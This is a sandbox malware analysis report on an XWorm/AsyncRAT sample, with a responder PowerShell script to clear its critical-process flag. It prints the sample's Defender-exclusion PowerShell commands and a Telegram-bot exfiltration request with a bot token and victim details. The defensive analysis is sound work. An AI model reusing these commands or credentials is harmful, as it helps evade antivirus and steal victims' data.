Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x9444 | 0x9600 | bfe1b3cb90cc5ce86496a9a95d11d1f2 | False | 0.4913020833333333 | data | 5.68571702212104 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x4d8 | 0x600 | 2472af5ddbb53779b7381f16b8b9407b | False | 0.3756510416666667 | data | 3.7216503306685733 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe000 | 0xc | 0x200 | 47e35f5613d58a1dcbd0066eff54903f | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xc0a0 | 0x244 | data | | | 0.4724137931034483
RT_MANIFEST | 0xc2e8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-17T17:26:33.365190+0200 | 2853685 | ETPRO MALWARE Win32/XWorm Checkin via Telegram | 1 | 192.168.2.6 | 49719 | 149.154.167.220 | 443 | TCP
2024-09-17T17:27:10.017016+0200 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.6 | 49724 | 147.185.221.21 | 56417 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 17, 2024 17:26:32.435970068 CEST | 49719 | 443 | 192.168.2.6 | 149.154.167.220
Sep 17, 2024 17:26:32.436028957 CEST | 443 | 49719 | 149.154.167.220 | 192.168.2.6
Sep 17, 2024 17:26:32.436153889 CEST | 49719 | 443 | 192.168.2.6 | 149.154.167.220
Sep 17, 2024 17:26:32.444457054 CEST | 49719 | 443 | 192.168.2.6 | 149.154.167.220
Sep 17, 2024 17:26:32.444488049 CEST | 443 | 49719 | 149.154.167.220 | 192.168.2.6
Sep 17, 2024 17:26:33.061559916 CEST | 443 | 49719 | 149.154.167.220 | 192.168.2.6
Sep 17, 2024 17:26:33.061707020 CEST | 49719 | 443 | 192.168.2.6 | 149.154.167.220
Sep 17, 2024 17:26:33.064205885 CEST | 49719 | 443 | 192.168.2.6 | 149.154.167.220
Sep 17, 2024 17:26:33.064234972 CEST | 443 | 49719 | 149.154.167.220 | 192.168.2.6
Sep 17, 2024 17:26:33.064579964 CEST | 443 | 49719 | 149.154.167.220 | 192.168.2.6
Sep 17, 2024 17:26:33.108582973 CEST | 49719 | 443 | 192.168.2.6 | 149.154.167.220
Sep 17, 2024 17:26:33.151427031 CEST | 443 | 49719 | 149.154.167.220 | 192.168.2.6
Sep 17, 2024 17:26:33.365217924 CEST | 443 | 49719 | 149.154.167.220 | 192.168.2.6
Sep 17, 2024 17:26:33.365367889 CEST | 443 | 49719 | 149.154.167.220 | 192.168.2.6
Sep 17, 2024 17:26:33.365443945 CEST | 49719 | 443 | 192.168.2.6 | 149.154.167.220
Sep 17, 2024 17:26:33.385499001 CEST | 49719 | 443 | 192.168.2.6 | 149.154.167.220
Sep 17, 2024 17:26:37.652972937 CEST | 49721 | 56417 | 192.168.2.6 | 147.185.221.21
Sep 17, 2024 17:26:37.657946110 CEST | 56417 | 49721 | 147.185.221.21 | 192.168.2.6
Sep 17, 2024 17:26:37.658035994 CEST | 49721 | 56417 | 192.168.2.6 | 147.185.221.21
Sep 17, 2024 17:26:37.701281071 CEST | 49721 | 56417 | 192.168.2.6 | 147.185.221.21
Sep 17, 2024 17:26:37.711170912 CEST | 56417 | 49721 | 147.185.221.21 | 192.168.2.6
Sep 17, 2024 17:26:52.050946951 CEST | 49721 | 56417 | 192.168.2.6 | 147.185.221.21
Sep 17, 2024 17:26:52.055916071 CEST | 56417 | 49721 | 147.185.221.21 | 192.168.2.6
Sep 17, 2024 17:26:59.046892881 CEST | 56417 | 49721 | 147.185.221.21 | 192.168.2.6
Sep 17, 2024 17:26:59.046988010 CEST | 49721 | 56417 | 192.168.2.6 | 147.185.221.21
Sep 17, 2024 17:26:59.138948917 CEST | 49721 | 56417 | 192.168.2.6 | 147.185.221.21
Sep 17, 2024 17:26:59.141267061 CEST | 49724 | 56417 | 192.168.2.6 | 147.185.221.21
Sep 17, 2024 17:26:59.143874884 CEST | 56417 | 49721 | 147.185.221.21 | 192.168.2.6
Sep 17, 2024 17:26:59.146174908 CEST | 56417 | 49724 | 147.185.221.21 | 192.168.2.6
Sep 17, 2024 17:26:59.146249056 CEST | 49724 | 56417 | 192.168.2.6 | 147.185.221.21
Sep 17, 2024 17:26:59.273515940 CEST | 49724 | 56417 | 192.168.2.6 | 147.185.221.21
Sep 17, 2024 17:26:59.278532028 CEST | 56417 | 49724 | 147.185.221.21 | 192.168.2.6
Sep 17, 2024 17:27:10.017015934 CEST | 49724 | 56417 | 192.168.2.6 | 147.185.221.21
Sep 17, 2024 17:27:10.022094011 CEST | 56417 | 49724 | 147.185.221.21 | 192.168.2.6
Sep 17, 2024 17:27:20.529722929 CEST | 56417 | 49724 | 147.185.221.21 | 192.168.2.6
Sep 17, 2024 17:27:20.529853106 CEST | 49724 | 56417 | 192.168.2.6 | 147.185.221.21
Sep 17, 2024 17:27:22.782371998 CEST | 49724 | 56417 | 192.168.2.6 | 147.185.221.21
                                                                  Sep 17, 2024 17:27:22.784394979 CEST4972556417192.168.2.6147.185.221.21
                                                                  Sep 17, 2024 17:27:22.787466049 CEST5641749724147.185.221.21192.168.2.6
                                                                  Sep 17, 2024 17:27:22.789448023 CEST5641749725147.185.221.21192.168.2.6
                                                                  Sep 17, 2024 17:27:22.789546967 CEST4972556417192.168.2.6147.185.221.21
                                                                  Sep 17, 2024 17:27:22.812690973 CEST4972556417192.168.2.6147.185.221.21
                                                                  Sep 17, 2024 17:27:22.817555904 CEST5641749725147.185.221.21192.168.2.6
                                                                  Sep 17, 2024 17:27:35.938864946 CEST4972556417192.168.2.6147.185.221.21
                                                                  Sep 17, 2024 17:27:35.943952084 CEST5641749725147.185.221.21192.168.2.6
                                                                  Sep 17, 2024 17:27:43.704189062 CEST4972556417192.168.2.6147.185.221.21
                                                                  Sep 17, 2024 17:27:43.709101915 CEST5641749725147.185.221.21192.168.2.6
                                                                  Sep 17, 2024 17:27:44.184370041 CEST5641749725147.185.221.21192.168.2.6
                                                                  Sep 17, 2024 17:27:44.184663057 CEST4972556417192.168.2.6147.185.221.21
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 17, 2024 17:26:32.420015097 CEST | 60972 | 53 | 192.168.2.6 | 1.1.1.1
Sep 17, 2024 17:26:32.428956032 CEST | 53 | 60972 | 1.1.1.1 | 192.168.2.6
Sep 17, 2024 17:26:37.616822958 CEST | 59403 | 53 | 192.168.2.6 | 1.1.1.1
Sep 17, 2024 17:26:37.649071932 CEST | 53 | 59403 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 17, 2024 17:26:32.420015097 CEST | 192.168.2.6 | 1.1.1.1 | 0x8624 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Sep 17, 2024 17:26:37.616822958 CEST | 192.168.2.6 | 1.1.1.1 | 0xa552 | Standard query (0) | paul-vocational.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 17, 2024 17:26:32.428956032 CEST | 1.1.1.1 | 192.168.2.6 | 0x8624 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Sep 17, 2024 17:26:37.649071932 CEST | 1.1.1.1 | 192.168.2.6 | 0xa552 | No error (0) | paul-vocational.gl.at.ply.gg | | 147.185.221.21 | A (IP address) | IN (0x0001) | false
                                                                  • api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49719 | 149.154.167.220 | 443 | 3576 | C:\Users\user\Desktop\NzEsfIiAc0.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-17 15:26:33 UTC | 449 | OUT | GET /bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage?chat_id=6378619811&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AF248E435BF45453C730E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20AFXDXR%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-09-17 15:26:33 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 17 Sep 2024 15:26:33 GMT
Content-Type: application/json
Content-Length: 451
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-17 15:26:33 UTC | 451 | IN | Data Ascii: {"ok":true,"result":{"message_id":352,"from":{"id":7257052308,"is_bot":true,"first_name":"Office365 Virus Resultz","username":"Morganz365bot"},"chat":{"id":6378619811,"first_name":"HSR","username":"Hsr_safk","type":"private"},"date":1726586793,"text":"\u2



Target ID: 0
Start time: 11:25:33
Start date: 17/09/2024
Path: C:\Users\user\Desktop\NzEsfIiAc0.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\NzEsfIiAc0.exe"
Imagebase: 0x260000
File size: 40'960 bytes
MD5 hash: BFDF788A451CF345E09E7646734F4666
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2148971109.0000000000262000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2148971109.0000000000262000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
Reputation: low
Has exited: false

Target ID: 2
Start time: 11:25:37
Start date: 17/09/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe'
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 11:25:37
Start date: 17/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 11:25:43
Start date: 17/09/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NzEsfIiAc0.exe'
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 11:25:43
Start date: 17/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 11:25:54
Start date: 17/09/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 11:25:54
Start date: 17/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 11:26:10
Start date: 17/09/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 14
Start time: 11:26:10
Start date: 17/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 20%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 6
Total number of Limit Nodes: 0

Execution graph (rendered graph omitted; node list recovered from the dump): 7ffd3477202a -> 7ffd34772570 (RtlSetProcessIsCritical) -> 7ffd34772622, and 7ffd34773638 -> 7ffd34773641 (SetWindowsHookExW) -> 7ffd34773711.

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3439398585.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd34770000_NzEsfIiAc0.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CAO_^
                                                                    • API String ID: 0-3111533842
                                                                    • Opcode ID: b4807f3394d74b09bcbcd964ce290d1a9ae81de574dd794918b7faa9615aeb3a
                                                                    • Instruction ID: 1c9b8e4296764a968ce48e7c0869e63e855cdf976426eec5d933a896518a64e2
                                                                    • Opcode Fuzzy Hash: b4807f3394d74b09bcbcd964ce290d1a9ae81de574dd794918b7faa9615aeb3a
                                                                    • Instruction Fuzzy Hash: 7922E861B18A494FE7A4EB7888B967D7BD1FF89304F804579E44EC3292DE68BC418781

                                                                    Control-flow Graph

Control-flow graph for the function at 7ffd347770b6-7ffd34777573 (basic-block edge list omitted); the only call recorded is to 7ffd34777574 from the block at 7ffd347774f3-7ffd34777558.
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3439398585.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd34770000_NzEsfIiAc0.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f63210fcc299d98bcf32e1630bbe408e66ed3ddb9f52a9d44e5f61c803626fc0
                                                                    • Instruction ID: a84a833584a4f6185a862f4719ededc0f1c2efa0928656a917cc5fe20ef4c7a1
                                                                    • Opcode Fuzzy Hash: f63210fcc299d98bcf32e1630bbe408e66ed3ddb9f52a9d44e5f61c803626fc0
                                                                    • Instruction Fuzzy Hash: 03F1A670608A4D8FEBA8DF28CC557F97BE1FF55310F54826AE84DC7291CB78A9418B81
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3439398585.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd34770000_NzEsfIiAc0.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 620a485c901437301660681409dd0b172c17e751d2c2f3d42f15a1ff130e1535
                                                                    • Instruction ID: 4cb4cdf80d45a5797c997c6495cd83a0e1ee2fca583c5477c760da0a43fc6027
                                                                    • Opcode Fuzzy Hash: 620a485c901437301660681409dd0b172c17e751d2c2f3d42f15a1ff130e1535
                                                                    • Instruction Fuzzy Hash: 22E1A570A08A4D8FEBA8DF28C8657F97BD1FB55310F54826ED84DC7291CE78A84187C1

                                                                    Control-flow Graph

Control-flow graph for the function at 7ffd3477253d-7ffd3477265d (basic-block edge list omitted); the block at 7ffd347725a0-7ffd34772620 calls RtlSetProcessIsCritical.
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3439398585.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd34770000_NzEsfIiAc0.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalProcess
                                                                    • String ID:
                                                                    • API String ID: 2695349919-0
                                                                    • Opcode ID: 11b8860aab8fceae604275fe99d7f9a3081629ea5c119d2ddcc679f670e20394
                                                                    • Instruction ID: c5e265fd1d75c47cc6f2fbaaaec029a4a9634f249effbb9d963e3ca1207c0e4f
                                                                    • Opcode Fuzzy Hash: 11b8860aab8fceae604275fe99d7f9a3081629ea5c119d2ddcc679f670e20394
                                                                    • Instruction Fuzzy Hash: 0D41043190CA588FD718DFA8C855AE9BBF0FF56311F04416FE08AD3592CB686846CB91

Control-flow Graph

Control-flow graph (graph image and Executed / Not Executed legend omitted): function 7ffd34773638-7ffd3477374d, 10 basic blocks. Block 7ffd347736d2-7ffd3477370f calls SetWindowsHookExW; both of its predecessors (7ffd347736c3-7ffd347736d0 and 7ffd34773749-7ffd3477374d) flow into it, so the hook is installed on every path through the function.
APIs
• SetWindowsHookExW, called from block 7ffd347736d2-7ffd3477370f (installs a Windows hook procedure; the hook type argument is not visible in this dump)
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3439398585.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd34770000_NzEsfIiAc0.jbxd
                                                                    Similarity
                                                                    • API ID: HookWindows
                                                                    • String ID:
                                                                    • API String ID: 2559412058-0
                                                                    • Opcode ID: 4321a89f0040b05847e87d0bab0953eaf716e9d08db5c22a4201785764e4f6ea
                                                                    • Instruction ID: fb0939bde0a1174568df7e770d16b98d7c4c4e55b7f3905204852c7845cffa2e
                                                                    • Opcode Fuzzy Hash: 4321a89f0040b05847e87d0bab0953eaf716e9d08db5c22a4201785764e4f6ea
                                                                    • Instruction Fuzzy Hash: AB41F871A1CA5D8FDB58DF5C98566F9BBE1EB99321F00423ED009D3292CA64B852C7C1

Control-flow Graph

Control-flow graph (graph image and Executed / Not Executed legend omitted): function 7ffd3477202a-7ffd3477265d, 4 basic blocks. Block 7ffd347725c2-7ffd34772620 calls RtlSetProcessIsCritical; this is the same call (block ending at 7ffd34772620) as in the first RtlSetProcessIsCritical graph of this group, reached here from an entry at 7ffd3477202a.
APIs
• RtlSetProcessIsCritical, called from block 7ffd347725c2-7ffd34772620
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3439398585.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd34770000_NzEsfIiAc0.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalProcess
                                                                    • String ID:
                                                                    • API String ID: 2695349919-0
                                                                    • Opcode ID: f5a7038b086e1ccd6e51eb9a2a4de809135cc783387bda33d56968f7f6841c17
                                                                    • Instruction ID: 2398ef5090a70474280316440e3b35f4a63471f16f3cb48fcb42ffbe67936f96
                                                                    • Opcode Fuzzy Hash: f5a7038b086e1ccd6e51eb9a2a4de809135cc783387bda33d56968f7f6841c17
                                                                    • Instruction Fuzzy Hash: AB31D271908A188FDB28DF9CD845BFDBBE0FF59311F14412EE09AD3682CB7468528B91
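Both RtlSetProcessIsCritical graphs above show the sample marking itself as a critical process, which means killing it from Task Manager or Stop-Process triggers a CRITICAL_PROCESS_DIED bugcheck. The following PowerShell is an added example for responders; it is not code from the sample, from the report, or from Joe Sandbox. It queries the ProcessBreakOnTermination flag through NtQueryInformationProcess, clears it with NtSetInformationProcess, and only then terminates the process. The PID 1234 and the function names are assumptions for illustration; everything else is the documented ntdll interface.

```powershell
# Added example: inspect and clear the BreakOnTermination ("critical process")
# flag that RtlSetProcessIsCritical sets, so the sample can be terminated
# without a bugcheck. Run from an elevated PowerShell session (SeDebugPrivilege
# is required to clear the flag on another process).

Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class NtProcessInfo
{
    [DllImport("ntdll.dll")]
    public static extern int NtQueryInformationProcess(IntPtr hProcess, int infoClass, ref uint info, int infoLength, out int returnLength);

    [DllImport("ntdll.dll")]
    public static extern int NtSetInformationProcess(IntPtr hProcess, int infoClass, ref uint info, int infoLength);
}
"@

# PROCESSINFOCLASS value ProcessBreakOnTermination (0x1D). RtlSetProcessIsCritical
# is a thin wrapper that sets this class to 1 on the calling process.
$script:ProcessBreakOnTermination = 29

function Test-CriticalProcess {
    # Returns $true when the target process has the BreakOnTermination flag set.
    param([Parameter(Mandatory)][int]$ProcessId)
    $proc = Get-Process -Id $ProcessId -ErrorAction Stop
    $flag = [uint32]0
    $returned = 0
    $status = [NtProcessInfo]::NtQueryInformationProcess($proc.Handle, $script:ProcessBreakOnTermination, [ref]$flag, 4, [ref]$returned)
    if ($status -ne 0) {
        throw ("NtQueryInformationProcess failed for PID {0}: NTSTATUS 0x{1:X8}" -f $ProcessId, $status)
    }
    return [bool]$flag
}

function Clear-CriticalProcess {
    # Writes 0 to ProcessBreakOnTermination; after this the process dies normally.
    param([Parameter(Mandatory)][int]$ProcessId)
    $proc = Get-Process -Id $ProcessId -ErrorAction Stop
    $flag = [uint32]0
    $status = [NtProcessInfo]::NtSetInformationProcess($proc.Handle, $script:ProcessBreakOnTermination, [ref]$flag, 4)
    if ($status -ne 0) {
        throw ("NtSetInformationProcess failed for PID {0}: NTSTATUS 0x{1:X8}" -f $ProcessId, $status)
    }
}

# Triage: list every process that currently carries the flag. Legitimate
# critical processes (csrss, wininit, services, smss) will appear here too;
# anything else running from a user-writable path deserves a closer look.
$critical = Get-Process | Where-Object {
    try { Test-CriticalProcess -ProcessId $_.Id } catch { $false }
}
$critical | Select-Object Id, ProcessName, Path | Format-Table -AutoSize

# Containment: clear the flag on the sample before stopping it. The PID is an
# assumption; take the real one from the report's process tree.
$samplePid = 1234
if (Test-CriticalProcess -ProcessId $samplePid) {
    Clear-CriticalProcess -ProcessId $samplePid
}
Stop-Process -Id $samplePid -Force
```

Test-CriticalProcess is safe to run across the whole process list because it only reads; the write path in Clear-CriticalProcess is the step that must never be applied to the legitimate critical system processes, since clearing their flag and stopping them destabilises the session rather than the malware.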
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3439398585.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd34770000_NzEsfIiAc0.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 04a2f3c964b070f977a9fecb0a51e42cab1c24b4331b5a822d1ddf8d9d2510b4
                                                                    • Instruction ID: e975f4ad3f32b4c2029071781e06b51210e8a4c6805a7a807d09204f037a62c0
                                                                    • Opcode Fuzzy Hash: 04a2f3c964b070f977a9fecb0a51e42cab1c24b4331b5a822d1ddf8d9d2510b4
                                                                    • Instruction Fuzzy Hash: 2D514E5AA0D7D39AE712573D58B20F63FA0DF53229B5A50F3C2C4CE093DA4D690AD3A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2244526939.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6635170f13f41f89d62c93cec21d4c93c1f0b789c35391162de4328867c3bfe4
                                                                    • Instruction ID: 99a15d5f11ce505ff65a73928c1ce5ca96a835d9e74c615ed8f055e970c7b99b
                                                                    • Opcode Fuzzy Hash: 6635170f13f41f89d62c93cec21d4c93c1f0b789c35391162de4328867c3bfe4
                                                                    • Instruction Fuzzy Hash: 80116D7690E7C89FDB938B389CA90947FB0EE6321070901EBC588CB1A3DA1D5C49D792
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2244978323.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffd34870000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9c0e427a098b2c480bb8e64c5c85d47af895d6568c9064676dee9fd4ef1f80a5
                                                                    • Instruction ID: f29261885bf2a8042b4c2caa1a8771dcf0e73722a94eb279d8719f2607be6233
                                                                    • Opcode Fuzzy Hash: 9c0e427a098b2c480bb8e64c5c85d47af895d6568c9064676dee9fd4ef1f80a5
                                                                    • Instruction Fuzzy Hash: 19511832B0DA964FE7D9EB1C48B11747BD2EF96660B5841BAC28DC7293DD28EC059341
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2244526939.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 99bb3a2023b3b6e7799b9e964057e7aebbd7f1a50a4a31b7e7c3920fc706d453
                                                                    • Instruction ID: 848c85eb44e42f48b60dfdec40720a28e7e5ae840c1911f8f4642d1ec9eac59c
                                                                    • Opcode Fuzzy Hash: 99bb3a2023b3b6e7799b9e964057e7aebbd7f1a50a4a31b7e7c3920fc706d453
                                                                    • Instruction Fuzzy Hash: CB311771A1CB488FDB589F0C98466A9BBE0FBA9310F00412FE449C3252CA24F855CBC2
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2244003260.00007FFD3468D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3468D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffd3468d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8648456f21d7a80b8a193ee66483048ea646d98dd067603d510396e65d20f8d5
                                                                    • Instruction ID: 8c6a4374e11bcbb4b61c81dfa86f5b835a3732423835f1a00d483a339c9c547a
                                                                    • Opcode Fuzzy Hash: 8648456f21d7a80b8a193ee66483048ea646d98dd067603d510396e65d20f8d5
                                                                    • Instruction Fuzzy Hash: 7041F37190DBC45FE7968B28D8959923FB0EF53324B1505EFD08CCB1A3D629A84AC793
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2244526939.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1af2cdd22f0e0839c76a41d5af5f7c3f8dff67215b77d7dc8928fa3a8aaa98ff
                                                                    • Instruction ID: 4d759bafd28dd953b13c3ad81f6a6d3a3b1e88b80a4e930eb3eb67e618e8d6eb
                                                                    • Opcode Fuzzy Hash: 1af2cdd22f0e0839c76a41d5af5f7c3f8dff67215b77d7dc8928fa3a8aaa98ff
